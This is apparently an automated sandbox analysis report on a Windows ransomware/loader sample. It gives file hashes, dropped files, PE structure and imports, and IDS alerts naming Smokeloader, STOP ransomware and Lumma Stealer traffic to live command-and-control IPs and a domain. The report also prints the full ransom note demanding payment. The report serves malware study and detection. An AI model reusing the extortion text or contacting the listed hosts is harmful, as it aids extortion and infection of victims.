MD5:	6B15B12446BEBA735AD3543B312E9758
SHA1:	4BB7A54B565161FAEF7A37C597AAAAD0DD8837A4
SHA-256:	EC27F1931FC17AC231325FF4C2486FE1EFEAD25EC1EA95BF62C15036EBCB52C3
SHA-512:	720F6EEFF307137B042493D19BB759D46A9EDC1C11DA011780C7359C20E9A470A15D62B166ADD7A8D03CE072D83B92F81FBB53A450C4446B7DD4D02AAD3CB02D
Malicious:	false
Preview:	<?xmlS.{$z'Eo...........`...J.-.....AO..E.}.Y.@P8x.s.&<...K}..\....o>.R.y...Z.E],)(:..?.6$.-...N9VM........8:;.L..._..u,.....fq....h.".u..S.....,i).-......p..._\|A..e<....6(...g.....>..:0N.a.CN..cR..hQR.aW..C.!.[..<....n...FF.ve.?1t._...;.\..z^G`8SL"..... ..&(:...8+<.[.xy...E.....e..-.y.,C...?..`..4..N..O...$.=/....}i.r.U0......aZ~..$T........{....<6K;.....0...(....9.........;./..3........l..8.g1...A.Gi.C........B..G.Q.yI.d>.5...T..hwt..o.a.m.....".(.7.n-....W8.J..)...2?.Z.Xh.J.....r<.+#.$VW........)8...Y+..X.\|......0.........^..j&..hY-l...>...xD....K.C.H...Q.%.A.._.8{Dzo...O#.\|T.....=....=...4..V.\|7..c0..g.;....X7[R......>..x...{<.o-..O.PRZ{.Oz.S..6.n..eH........@h.3..}.=..1.U.l...F.v.@....EY..8.......3......no..X...3.8.._.P.2.D..............#[.WV....WL&-.....c...h...^.2z.....3..(...?R...\K.0>...\|k.....]Aqh..Q3..B..~...R._l...#)n.k.K..8,H..`..6O....0....z3.]..&..80...B../.(..X...z1}'.q.Pq~?Q-FWB.G..X.2...=}$...C..($..

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.769418229110851
Encrypted:	false
SSDEEP:	24:fmCxuTol16f8LcVDc0D5sVNNeq2dtL3z2Tz0JCgkOw1bD:fbl16f9V0NgtL3zC0JCkyD
MD5:	6B15B12446BEBA735AD3543B312E9758
SHA1:	4BB7A54B565161FAEF7A37C597AAAAD0DD8837A4
SHA-256:	EC27F1931FC17AC231325FF4C2486FE1EFEAD25EC1EA95BF62C15036EBCB52C3
SHA-512:	720F6EEFF307137B042493D19BB759D46A9EDC1C11DA011780C7359C20E9A470A15D62B166ADD7A8D03CE072D83B92F81FBB53A450C4446B7DD4D02AAD3CB02D
Malicious:	false
Preview:	<?xmlS.{$z'Eo...........`...J.-.....AO..E.}.Y.@P8x.s.&<...K}..\....o>.R.y...Z.E],)(:..?.6$.-...N9VM........8:;.L..._..u,.....fq....h.".u..S.....,i).-......p..._\|A..e<....6(...g.....>..:0N.a.CN..cR..hQR.aW..C.!.[..<....n...FF.ve.?1t._...;.\..z^G`8SL"..... ..&(:...8+<.[.xy...E.....e..-.y.,C...?..`..4..N..O...$.=/....}i.r.U0......aZ~..$T........{....<6K;.....0...(....9.........;./..3........l..8.g1...A.Gi.C........B..G.Q.yI.d>.5...T..hwt..o.a.m.....".(.7.n-....W8.J..)...2?.Z.Xh.J.....r<.+#.$VW........)8...Y+..X.\|......0.........^..j&..hY-l...>...xD....K.C.H...Q.%.A.._.8{Dzo...O#.\|T.....=....=...4..V.\|7..c0..g.;....X7[R......>..x...{<.o-..O.PRZ{.Oz.S..6.n..eH........@h.3..}.=..1.U.l...F.v.@....EY..8.......3......no..X...3.8.._.P.2.D..............#[.WV....WL&-.....c...h...^.2z.....3..(...?R...\K.0>...\|k.....]Aqh..Q3..B..~...R._l...#)n.k.K..8,H..`..6O....0....z3.]..&..80...B../.(..X...z1}'.q.Pq~?Q-FWB.G..X.2...=}$...C..($..

C:\Users\user\_README.txt

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.898906330049753
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNYbmFRqrs6314kA+GT/kF5M2/kJw3RJM:WZHfv0pfNAU5WEYNYbPs41rDGT0f/kiK
MD5:	3B2A0B49205B9CD88C25B002B4833C1E
SHA1:	2A70E9920219D56555B04FADEBA8D3F75B49692A
SHA-256:	6F18FF96ADA23362DCBD8019D3B15E6AF306EE2BBBB5EEF7821C1200782E990E
SHA-512:	B9FCEE7033CF68B5AFD15F8679C6F6B9717C1EA2B3D4C324410A8809D6054FA44D7D4DC103DB691734C51DE8C3FABD13F1C3E62B4C9F6B0C9BA731FB53A6DC93
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\_README.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.898906330049753
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNYbmFRqrs6314kA+GT/kF5M2/kJw3RJM:WZHfv0pfNAU5WEYNYbPs41rDGT0f/kiK
MD5:	3B2A0B49205B9CD88C25B002B4833C1E
SHA1:	2A70E9920219D56555B04FADEBA8D3F75B49692A
SHA-256:	6F18FF96ADA23362DCBD8019D3B15E6AF306EE2BBBB5EEF7821C1200782E990E
SHA-512:	B9FCEE7033CF68B5AFD15F8679C6F6B9717C1EA2B3D4C324410A8809D6054FA44D7D4DC103DB691734C51DE8C3FABD13F1C3E62B4C9F6B0C9BA731FB53A6DC93
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.192110170113443
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe
File size:	296'960 bytes
MD5:	e478a6638150036e4009beb1530187bb
SHA1:	6c49c874ba692a84f8ebd46c2cdab07aca026ce4
SHA256:	a78b39de8c05456e93a88136f9caaee35e9b5149acf072acd3214b28293c7910
SHA512:	35c7b708dc696c20510d4c978d0a5591ec9dc4953c0dffb2b02e9e033dc8d4d9bc65b9d900daaa8550ede92a6dfc344f4da4f4460febcaabc69d06add70cfb36
SSDEEP:	3072:UftVMmPJYH+9YwY3ltaFyz3fsA23+tqB+tad0xEVKZ6OKKs6vg33qN:U3dRYH+9YqFc3kA23+QwtwyEcNPg33q
TLSH:	B5549E1132A0FA71D47309F079A9C6E119FAB8B15F64879B735A3A5F3A71BC08D35322
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F...(...(...(.......(.......(.......(.......(...)...(.......(.......(.......(.Rich..(.................PE..L....FFc...........

File Icon


Icon Hash:	1369454d29170717

Static PE Info

General

Entrypoint:	0x4022bf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6346469D [Wed Oct 12 04:46:21 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ec3abec3d94db3f742ac97930ba3d6d5

Entrypoint Preview

Instruction
call 00007F91D4C5746Ah
jmp 00007F91D4C531BEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040C248h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F91D4C5333Eh
test byte ptr [eax], 00000008h
je 00007F91D4C53339h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040C0A0h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00433BD8h], eax
mov dword ptr [00433BD4h], ecx
mov dword ptr [00433BD0h], edx
mov dword ptr [00433BCCh], ebx
mov dword ptr [00433BC8h], esi
mov dword ptr [00433BC4h], edi
mov word ptr [00433BF0h], ss
mov word ptr [00433BE4h], cs
mov word ptr [00433BC0h], ds
mov word ptr [00433BBCh], es
mov word ptr [00433BB8h], fs
mov word ptr [00433BB4h], gs
pushfd
pop dword ptr [00433BE8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00433BDCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00433BE0h], eax
lea eax, dword ptr [ebp+08h]

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28334	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x275c000	0x150b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xafd8	0xb000	129218c3d9146f15e30de066f3ddb356	False	0.6047585227272727	data	6.559661242602964	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x1cbaa	0x1cc00	d3e25e0fd8a10d423eb885b282eeb305	False	0.5018087635869565	data	5.1237310007613015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x29000	0x2732668	0xb600	f249dc1de9dc9b36adff2be4cd6c1002	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x275c000	0x150b0	0x15200	abf57c508aa7c527c7272c0a779c9742	False	0.5330759985207101	data	5.5429528966865025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
GASEM	0x276ef30	0x476	ASCII text, with very long lines (1142), with no line terminators	Setsuana	South Africa	0.6190893169877408
RT_CURSOR	0x276f3d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x275c740	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa	0.43150319829424305
RT_ICON	0x275d5e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa	0.5613718411552346
RT_ICON	0x275de90	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Setsuana	South Africa	0.6342165898617511
RT_ICON	0x275e558	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa	0.7117052023121387
RT_ICON	0x275eac0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa	0.5519709543568465
RT_ICON	0x2761068	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa	0.5816135084427767
RT_ICON	0x2762110	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa	0.6618852459016393
RT_ICON	0x2762a98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa	0.6976950354609929
RT_ICON	0x2762f78	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa	0.42137526652452023
RT_ICON	0x2763e20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa	0.5582129963898917
RT_ICON	0x27646c8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Setsuana	South Africa	0.6324884792626728
RT_ICON	0x2764d90	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa	0.6813583815028902
RT_ICON	0x27652f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa	0.5297717842323652
RT_ICON	0x27678a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa	0.6040983606557377
RT_ICON	0x2768228	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa	0.625
RT_ICON	0x27686f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa	0.38566098081023453
RT_ICON	0x27695a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa	0.5306859205776173
RT_ICON	0x2769e48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Setsuana	South Africa	0.5956221198156681
RT_ICON	0x276a510	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa	0.6372832369942196
RT_ICON	0x276aa78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa	0.5311203319502075
RT_ICON	0x276d020	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa	0.5297842401500938
RT_ICON	0x276e0c8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa	0.530327868852459
RT_ICON	0x276ea50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa	0.5469858156028369
RT_STRING	0x2770478	0x150	data			0.5148809523809523
RT_STRING	0x27705c8	0x666	data			0.44017094017094016
RT_STRING	0x2770c30	0x480	data			0.4592013888888889
RT_ACCELERATOR	0x276f3a8	0x28	data			1.0
RT_GROUP_CURSOR	0x2770278	0x14	data			1.25
RT_GROUP_ICON	0x2762f00	0x76	data	Setsuana	South Africa	0.6610169491525424
RT_GROUP_ICON	0x2768690	0x68	data	Setsuana	South Africa	0.7019230769230769
RT_GROUP_ICON	0x276eeb8	0x76	data	Setsuana	South Africa	0.6694915254237288
RT_VERSION	0x2770290	0x1e4	data			0.5785123966942148

Imports

DLL

Import

KERNEL32.dll

LocalUnlock, GetDateFormatW, HeapReAlloc, GetConsoleAliasesLengthW, HeapFree, SetComputerNameW, GetModuleHandleW, GetUserDefaultLangID, GlobalAlloc, LoadLibraryW, GetLocaleInfoW, GetConsoleAliasExesLengthW, WriteConsoleOutputA, GetAtomNameW, CreateFileW, WritePrivateProfileStringW, GetThreadLocale, GetProcAddress, GetLongPathNameA, HeapSize, LoadLibraryA, CreateHardLinkW, FindFirstVolumeMountPointW, SetConsoleOutputCP, FindAtomA, GlobalFindAtomW, CreatePipe, GetModuleFileNameA, SetConsoleTitleW, HeapSetInformation, GetCurrentDirectoryA, DeleteCriticalSection, SetCalendarInfoA, SetFileAttributesW, HeapAlloc, GetLastError, ExitProcess, DecodePointer, GetCommandLineW, GetStartupInfoW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, IsProcessorFeaturePresent, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleW, LCMapStringW, GetStringTypeW, FlushFileBuffers, ReadFile, CloseHandle

USER32.dll

GetMonitorInfoW, LoadIconA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Setsuana	South Africa

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/04/24-17:49:16.877758	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49755	80	192.168.2.10	193.106.175.76
04/04/24-17:49:16.288373	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49752	80	192.168.2.10	193.106.175.76
04/04/24-17:48:48.921116	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49709	80	192.168.2.10	193.106.175.76
04/04/24-17:49:14.776251	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49749	80	192.168.2.10	193.106.175.76
04/04/24-17:49:13.567114	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49746	80	192.168.2.10	193.106.175.76
04/04/24-17:49:22.058745	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49770	80	192.168.2.10	193.106.175.76
04/04/24-17:49:06.460714	TCP	2833438	ETPRO TROJAN STOP Ransomware CnC Activity	49733	80	192.168.2.10	189.195.132.134
04/04/24-17:49:20.631293	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49767	443	192.168.2.10	172.67.217.100
04/04/24-17:48:57.003394	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49718	80	192.168.2.10	193.106.175.76
04/04/24-17:48:52.580955	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49715	80	192.168.2.10	193.106.175.76
04/04/24-17:49:10.679091	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49741	443	192.168.2.10	172.67.217.100
04/04/24-17:48:59.993121	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49724	80	192.168.2.10	193.106.175.76
04/04/24-17:49:22.188335	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49771	443	192.168.2.10	172.67.217.100
04/04/24-17:48:50.780975	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49712	80	192.168.2.10	193.106.175.76
04/04/24-17:49:10.536596	UDP	2050741	ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop)	60115	53	192.168.2.10	1.1.1.1
04/04/24-17:49:11.885746	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49744	443	192.168.2.10	172.67.217.100
04/04/24-17:48:58.821524	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49721	80	192.168.2.10	193.106.175.76
04/04/24-17:48:49.556280	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49710	80	192.168.2.10	193.106.175.76
04/04/24-17:49:03.873204	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49731	80	192.168.2.10	190.249.187.165
04/04/24-17:49:12.942777	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49745	80	192.168.2.10	193.106.175.76
04/04/24-17:48:53.159481	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49716	80	192.168.2.10	193.106.175.76
04/04/24-17:49:10.397981	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49739	80	192.168.2.10	193.106.175.76
04/04/24-17:49:17.585570	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49758	443	192.168.2.10	172.67.217.100
04/04/24-17:49:06.605631	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49734	80	192.168.2.10	189.195.132.134
04/04/24-17:49:01.780769	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49727	80	192.168.2.10	193.106.175.76
04/04/24-17:49:21.462222	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49768	80	192.168.2.10	193.106.175.76
04/04/24-17:49:19.692835	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49763	80	192.168.2.10	193.106.175.76
04/04/24-17:48:50.137339	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49711	80	192.168.2.10	193.106.175.76
04/04/24-17:49:17.487044	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49757	80	192.168.2.10	193.106.175.76
04/04/24-17:49:01.164132	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49726	80	192.168.2.10	193.106.175.76
04/04/24-17:48:58.190802	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49720	80	192.168.2.10	193.106.175.76
04/04/24-17:49:07.043115	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49733	189.195.132.134	192.168.2.10
04/04/24-17:48:52.008408	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49714	80	192.168.2.10	193.106.175.76
04/04/24-17:49:06.979370	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49732	189.195.132.134	192.168.2.10
04/04/24-17:49:16.172927	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49754	443	192.168.2.10	172.67.217.100
04/04/24-17:48:59.405957	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49723	80	192.168.2.10	193.106.175.76
04/04/24-17:49:18.076502	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49759	80	192.168.2.10	193.106.175.76
04/04/24-17:49:09.814891	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49738	80	192.168.2.10	193.106.175.76
04/04/24-17:49:03.873204	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49731	80	192.168.2.10	190.249.187.165
04/04/24-17:48:51.417167	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49713	80	192.168.2.10	193.106.175.76
04/04/24-17:49:11.114042	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49742	80	192.168.2.10	193.106.175.76
04/04/24-17:49:14.163008	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49748	80	192.168.2.10	193.106.175.76
04/04/24-17:49:20.283171	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49765	80	192.168.2.10	193.106.175.76
04/04/24-17:49:19.025167	TCP	2050742	ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI)	49762	443	192.168.2.10	172.67.217.100
04/04/24-17:49:06.605631	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49734	80	192.168.2.10	189.195.132.134
04/04/24-17:49:20.881308	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49766	80	192.168.2.10	193.106.175.76
04/04/24-17:49:09.231909	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49737	80	192.168.2.10	193.106.175.76
04/04/24-17:49:00.584097	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49725	80	192.168.2.10	193.106.175.76
04/04/24-17:49:22.644556	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49772	80	192.168.2.10	193.106.175.76
04/04/24-17:49:11.855189	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49743	80	192.168.2.10	193.106.175.76
04/04/24-17:48:57.606948	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49719	80	192.168.2.10	193.106.175.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 17:48:48.636796951 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:48.919356108 CEST	80	49709	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:48.920130968 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:48.921116114 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:48.921147108 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.203113079 CEST	80	49709	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.265110970 CEST	80	49709	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.265126944 CEST	80	49709	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.265250921 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.268102884 CEST	49709	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.271780014 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.552232027 CEST	80	49709	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.553338051 CEST	80	49710	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.556099892 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.556279898 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.556298971 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.835859060 CEST	80	49710	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.850984097 CEST	80	49710	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:49.851068020 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.851238012 CEST	49710	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:49.854137897 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.130832911 CEST	80	49710	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.136986971 CEST	80	49711	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.137103081 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.137339115 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.137351036 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.420509100 CEST	80	49711	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.420532942 CEST	80	49711	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.496069908 CEST	80	49711	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.496149063 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.496243954 CEST	49711	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.499061108 CEST	49712	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.779160023 CEST	80	49711	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.780642986 CEST	80	49712	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:50.780739069 CEST	49712	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.780975103 CEST	49712	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:50.780996084 CEST	49712	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:51.062628984 CEST	80	49712	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.077728987 CEST	80	49712	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:51.077791929 CEST	49712	80	192.168.2.10	193.106.175.76
